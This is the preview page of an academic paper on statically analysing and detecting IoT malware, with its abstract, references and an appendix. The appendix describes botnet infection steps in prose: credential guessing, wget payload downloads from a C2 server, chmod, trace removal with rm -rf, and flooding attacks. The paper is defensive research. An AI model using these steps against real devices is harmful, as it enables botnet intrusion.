Abstract
Software vulnerabilities in emerging systems, such as the Internet of Things (IoT), allow for multiple attack vectors that are exploited by adversaries for malicious intents. One of such vectors is malware, where limited efforts have been dedicated to IoT malware analysis, characterization, and understanding. In this paper, we analyze recent IoT malware through the lenses of static analysis. Towards this, we reverse-engineer and perform a detailed analysis of almost 2,900 IoT malware samples of eight different architectures across multiple analysis directions. We conduct string analysis, unveiling operation, unique textual characteristics, and network dependencies. Through the control flow graph analysis, we unveil unique graph-theoretic features. Through the function analysis, we address obfuscation by function approximation. We then pursue two applications based on our analysis: 1) Combining various analysis aspects, we reconstruct the infection lifecycle of various prominent malware families, and 2) using multiple classes of features obtained from our static analysis, we design a machine learning-based detection model with features that are robust and an average detection rate of 99.8%.
This is a preview of subscription content, log in via an institution to check access.
Access this chapter
Tax calculation will be finalised at checkout
Purchases are for personal use only
References
Aggarwal, C., Srivastava, K.: Securing IoT devices using SDN and edge computing. In: Proceedings of the 2nd International Conference on Next Generation Computing Technologies (NGCT), pp. 877–882. Uttarakhand, October 2016
Alasmary, H., Anwar, A., Park, J., Choi, J., Nyang, D., Mohaisen, A.: Graph-based comparison of IoT and android malware. In: Chen, X., Sen, A., Li, W.W., Thai, M.T. (eds.) CSoNet 2018. LNCS, vol. 11280, pp. 259–272. Springer, Cham (2018). https://doi.org/10.1007/978-3-030-04648-4_22
Alasmary, H., et al.: Analyzing and detecting emerging Internet of Things malware: a graph-based approach. IEEE Internet Things J. 6(5), 8977–8988 (2019)
Angrishi, K.: Turning Internet of Things IoT into Internet of Vulnerabilities IoV : IoT botnets. Computing Research Repository (CoRR) abs/1702.03681 (2017)
Antonakakis, M., et al.: Understanding the Mirai botnet. In: 26th USENIX Security Symposium, USENIX Security, pp. 1093–1110, Vancouver, August 2017
Azmoodeh, A., Dehghantanha, A., Choo, K.K.R.: Robust malware detection for Internet of (battlefield) Things devices using deep eigenspace learning. IEEE Trans. Sustain. Comput. 4(1), 88–95 (2018)
CBSNews: Baby monitor hacker delivers creepy message to child. https://tinyurl.com/y9g9948c. Accessed 2015
Cozzi, E., Graziano, M., Fratantonio, Y., Balzarotti, D.: Understanding Linux malware. In: IEEE Symposium on Security and Privacy (2018)
Developers: OpenWrt project. https://openwrt.org. Accessed 2018
Developers: VirusTotal. https://www.virustotal.com. Accessed 2018
Donno, M.D., Dragoni, N., Giaretta, A., Spognardi, A.: DDoS-capable IoT malwares: comparative analysis and Mirai investigation. Secur. Commun. Netw. 2018, 7178164:1–7178164:30 (2018)
Van der Elzen, I., van Heugten, J.: Techniques for detecting compromised IoT devices. University of Amsterdam (2017)
Feng, Y., Anand, S., Dillig, I., Aiken, A.: Apposcopy: semantics-based detection of android malware through static analysis. In: Proceedings of the 22nd ACM SIGSOFT International Symposium on Foundations of Software Engineering, pp. 576–587 (2014)
von Ahn’s A., Research Group: Offensive/profane word list. https://www.cs.cmu.edu/~biglou/resources/. Accessed 2018
Ham, H., Kim, H., Kim, M., Choi, M.: Linear SVM-based android malware detection for reliable IoT services. J. Appl. Math. 2014, 594501:1–594501:10 (2014)
IANA: Service name and transport protocol port number registry. https://tinyurl.com/mjusju4. Accessed 2018
, P.R.C. for Information Security: IoTPOT - analysing the rise of IoT compromises (2016). http://ipsr.ynu.ac.jp/iot/
Ismail, N.: The Internet of Things: the security crisis of 2018? (2016). https://tinyurl.com/ybsfcsg9
Kolias, C., Kambourakis, G., Stavrou, A., Voas, J.: DDoS in the IoT: Mirai and other botnets. Computer 50(7), 80–84 (2017)
MalwareMustDie: Mirai-source-code (2016). https://github.com/jgamblin/Mirai-Source-Code
Milosevic, J., Malek, M., Ferrante, A.: A friend or a foe? detecting malware using memory and CPU features. In: Proceedings of the 13th International Joint Conference on e-Business and Telecommunications, pp. 73–84 (2016)
NBCNews: Smart refrigerators hacked to send out spam: report. https://tinyurl.com/y9zjpybg. Accessed 2014
Newman, P.: The Internet of Things 2018 report: how the IoT is evolving to reach the mainstream with businesses and consumers (2018). https://tinyurl.com/y8xugzno
Pa, Y.M.P., Suzuki, S., Yoshioka, K., Matsumoto, T., Kasama, T., Rossow, C.: IoTPOT: a novel honeypot for revealing current IoT threats. J. Inf. Process. (JIP) 24, 522–533 (2016)
Sebastián, M., Rivera, R., Kotzias, P., Caballero, J.: AVclass: a tool for massive malware labeling. In: Monrose, F., Dacier, M., Blanc, G., Garcia-Alfaro, J. (eds.) RAID 2016. LNCS, vol. 9854, pp. 230–253. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-45719-2_11
Spring, T.: Mirai variant targets financial sector with IoT DDoS attacks. https://tinyurl.com/yaecazap. Accessed 2017
Su, J., Vargas, D.V., Prasad, S., Sgandurra, D., Feng, Y., Sakurai, K.: Lightweight classification of IoT malware based on image recognition. arXiv preprint arXiv:1802.03714 (2018)
Acknowledgments
This work was supported in part by a Collaborative Seed Award (2020) from Cyber Florida and NRF under NRF-2016K1A1A2912757.
Author information
Authors and Affiliations
Corresponding authors
Editor information
Editors and Affiliations
A Appendix
A Appendix
1.1 A.1 Infection Process Reconstruction
The infection starts with a dictionary attack using parameterized user credentials. Upon successful access, it attempts to access BusyBox or traverse to directories explicitly mentioned directly or parameterized. Then it downloads payloads from a specified C2 using a protocol, such as HTTP and wget. The downloaded file is then given read, write, and execute permissions using the chmod 777 command. The HTTP POST method is used to exfiltrate information from the host device to the C2. Upon infection the host participates in expanding the attack network by scanning IPs from a list of target IPs over a different port. Additionally, the presence of rm -rf reflects at the clearance of its traces to avoid detection. The malware finally launches a series of flooding attacks, using DNS amplification, HTTP, SNMP, wget, Junk, and TCP.
Although the malware from different families follow a similar sequence towards their objectives, we observe the difference in the ways to achieve those steps. Among the Tsunami family, we observe that the attack is device dependent, shown by the occurrence of words such as, Cisco, Oracle, Zte, and Dreambox. Table 8 shows that \(\approx \)83% of the Tsunami malware use IRC. For the Gafgyt family, we found that the execution depends on successfully accessing the endpoint using the explicitly mentioned credentials, such as default username-password combinations. Additionally, for the selection of the target devices, we observe masked IP addresses (recall the presence of octet mask and full mask) and IP addresses stored in a file downloaded from C2, as can be seen in Fig. 5. Also, Table 8 shows the infection strategy of Mirai, Tsunami, Gafgyt, and Lightaidra variants. It represents the samples among a variant that creates or traverses directories, or those that have access permission changes. It also exhibits the prevalence of transport protocols used to carry an attack, the methods used to download malicious shell scripts for infection, removal of executable files downloaded from the C2 after execution by family. We observe that 53 variants out of 64 Tsunami malware use IRC for infection. Although the table represents a certain vector in the malware behavior, that vector can have broad implications, within a family. We, however, do not generalize the observation across-architectures.
Retrieving a list of target hosts.
1.2 A.2 Function Approximation
For the malware that are stripped of their function names, we compare the CFG from their individual functions and compare CFG manually with the CFG from the main of the samples that have a main function. For the ten malware samples that we experimented on, we were able to approximate the main function.
A sample disassembly of Mirai malware. Observe the \(\text {8}^{th}\) instruction, where the program branches to the obfuscated main function.
Rights and permissions
Copyright information
© 2020 Springer Nature Switzerland AG
About this paper
Cite this paper
Anwar, A., Alasmary, H., Park, J., Wang, A., Chen, S., Mohaisen, D. (2020). Statically Dissecting Internet of Things Malware: Analysis, Characterization, and Detection. In: Meng, W., Gollmann, D., Jensen, C.D., Zhou, J. (eds) Information and Communications Security. ICICS 2020. Lecture Notes in Computer Science(), vol 12282. Springer, Cham. https://doi.org/10.1007/978-3-030-61078-4_25
Download citation
DOI: https://doi.org/10.1007/978-3-030-61078-4_25
Published:
Publisher Name: Springer, Cham
Print ISBN: 978-3-030-61077-7
Online ISBN: 978-3-030-61078-4
eBook Packages: Computer ScienceComputer Science (R0)